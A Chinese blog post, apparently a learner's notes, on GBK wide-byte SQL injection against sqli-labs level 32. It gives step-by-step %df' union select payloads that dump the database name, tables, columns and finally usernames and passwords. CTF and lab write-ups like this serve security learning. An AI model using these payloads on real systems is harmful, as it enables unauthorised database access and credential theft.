sql注入之宽字节注入的学习记录

最新推荐文章于 2024-09-09 23:37:05 发布
最新推荐文章于 2024-09-09 23:37:05 发布
阅读量309 收藏 4
点赞数 6
文章标签: sql 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalaojiaoweb/article/details/139767761
版权

本人小白一个,如果有错误的地方希望大佬可以指出,有疑问也可以在评论区留言我们可以一起探讨学习。

sql注入之宽字节注入

先来了解什么是宽字节

在不同的语言中不同的文字所占有的字节是不同的

英文与数字只占用一个字节

我们可以看到在文档中我写入了一个字母在属性中可以看到所占字节为1

如果是汉字呢?

可以看到变成了三个字节。

然后在英文数字与汉字之间还存在一种只占用两个字节的希腊字母,而我们的宽字节注入就是需要使用希腊字母来进行解析为不同的内容,从而影响SQL语句的结构和执行结果。

 现在我们可以打开sqli-labs的第32关来进行我们的一个测试

?id=0' order by 3--+

是不是会发现我们的注释符单引号被’\‘转义了,达不到我们闭合的一个目的了。在这种情况下无论如何我们都不可能进行一个注入。

我的理解是要将转义字符使用宽字节给挤掉。

第一步:注出数据库

?id=0%df' order by 4--+

在语句中%df是β的url编码

可以看到现在会进行一个正常的报错了吧。

?id=0%df' union select 1,database(),3--+

我们是不是就得到了数据库

第二步:注出数据库中的表

?id=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

第三步:注出数据库中的表中的列

这里我们依旧选择含有个人敏感信息的users表

?id=-1%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database()),3 --+

第四步:读取个人敏感信息

?id=0%df' union select 1,group_concat(username ,0x7e, password),3 from security.users--+

 总结一下

其实大家去多看看宽字节注入的sqli-libs的大佬题解就会发现一个问题:大佬们基本上只教给你如何注出数据库,后面的都没有进行一个演示,只是告诉你正常注出即可。

这就导致了一个问题。

?id=0%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),3--+

为什么我明明是一个正常的注入但是会报错呢,是不是因为后面有单引号导致的呢?

是的,那么我们可以通过%df将后面的单引号进行一个挤掉来注出呢?

?id=0%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= %df'security%df'),3--+

答案是不行。

如果师傅看过我前面的文章就会发现在这次注入中我所使用的语句和之前常用的有所不同。那是为了去掉后面存在单引号进行的一个影响。

当时我在学习sql注入中被这个问题困惑很久,希望可以对各位师傅们产生一定的帮助。

无需凭借风势,望汝直上云霄。

不会web的小白
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入宽字节注入
m0_56578216的博客
08-24 359
宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。宽字节注入是一种绕过单双引号转义的手段,严格来说并不是注入手段。
sqlmap跑宽字节注入(渗透测试之SQL注入宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 887
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
Sqllibs-less32-37-字节
Xor0ne
07-14 484
32.less32-Bypass addslashes() 32.1、注入分析-过滤斜杠、单引号、双引号 function check_addslashes($string) { /*preg_quote():执行一个正则表达式的搜索和替换 preg_quote():转义正则表达式字符*/ /*转义任何斜杠*/ $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any b
sql注入宽字节注入
m0_52484587的博客
07-11 747
str:需要添加反斜线的字符串。
sql注入宽字节注入学习与实践
不想当脚本小子的脚本小子
01-17 254
字节(两个字节)注入是由于mysql数据库使用了GBK编码,认为两个字符是一个汉字;注入的原理是利用编码转换,将服务器端强制添加的本来用于转移的 \ 符号吃掉而能够使得攻击者输入的引号起到闭合作用而可以进行SQL注入。 当输入 ‘ (单引号)时,被处理成\' 编码后为%5C%27再带入变成id=1\' and …… 无法注入 而当mysql在使用GBK编码时,会认为两个字符串是一个汉字(ASCII码大于128时才到汉字的范围) 输入%df'(%df加一个单引号)时,被处理成%df\' 编码后为%df
SQL注入——宽字节注入
weixin_74991270的博客
10-10 497
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
SQL注入宽字节注入
qq_45557130的博客
10-09 407
sql注入宽字节注入
Sql漏洞注入之宽字节注入
Matheus的博客
07-30 592
绕过–宽字节注入攻击 宽字节注入攻击 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca
详细讲解hive on tez中各个参数作用,以及如何优化sql
cclovezbf的博客
09-05 781
最近经常有优化sql的任务,但是自己能力有限,只能凭经验去优化,现整理加学习一波,也欢迎各位学习和讨论。我们经常用hivesql 的模型就是 join.如下。这里面发生了什么,执行流程是什么,为什么有的insert要几十分钟有的只要几分钟。--造1000w条数据 文件大小为300M已知上面的数据为1000w条其中 id=1的有1000条 其余id=1000到1000w的依次分布。
掌握SQLAlchemy:Python数据库的魔法师
AIGC搞起
09-05 1144
这段代码定义了一个User模型,映射到数据库中的users表。SQLAlchemy是一个强大的工具,它不仅简化了数据库操作,还提高了代码的可维护性和安全性。通过本文的介绍,你应该对如何使用SQLAlchemy有了基本的了解。继续探索,你会发现更多SQLAlchemy的强大功能和优雅解决方案。
SQL 代表什么?SQL 的全称是什么?
最新发布
程序员学习园地。
09-09 627
创建表修改表删除表。
【Mysql】系统服务启动访问报错问题处理:this is incompatible with sql_mode=only_full_group_by
Alex的博客
09-05 823
which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group。通过对问题的查找分析,查看官方文档发现从 MySQL 5.7.5 开始,默认 SQL 模式包括 ONLY_FULL_GROUP_BY。 (在 5.7.5 之前,MySQL 不检测函数依赖,并且默认不启用 ONLY_FULL_GROUP_BY。)这可能会导致一些sql语句失效
深入解析Flink SQL:基本概念与高级应用
GZM888888的博客
09-09 216
Flink SQL作为Flink的重要组成部分,提供了一种声明式的语法,使得开发者能够更加便捷地处理无界和有界数据流。未来,随着Flink生态的不断完善,Flink SQL将在更多场景下发挥其优势,成为大数据处理的核心技术之一。Flink SQL是基于Apache Flink的分布式数据处理引擎,它扩展了传统的SQL语义,以支持流式数据处理和批处理。与传统的关系型数据库中的SQL不同,Flink SQL设计用于处理高速、连续的数据流,并且支持事件时间处理和乱序数据的处理。二、Flink SQL的核心特性。
被低估的SQL
weixin_61431494的博客
09-03 1349
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
小记XML写sql的聚合函数用法
2301_76162638的博客
09-09 172
手动查出需要用于查询、展示的字段用法:(需要GROUP BY) 将每个岗位下的姓名合并为一个以逗号分隔的字符串的结果有长度限制,默认情况下是 1024 个字符,可以通过调整系统变量来增加这个限制。
SQL通用语法、SQL分类以及DDL
weixin_60564529的博客
09-03 996
SQL通用语法、SQL分类以及DDL的基础讲解
SQL 注入的宽字节注入的原理
06-09
宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入的原理是将非 ASCII 字符编码为多个 ASCII 字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值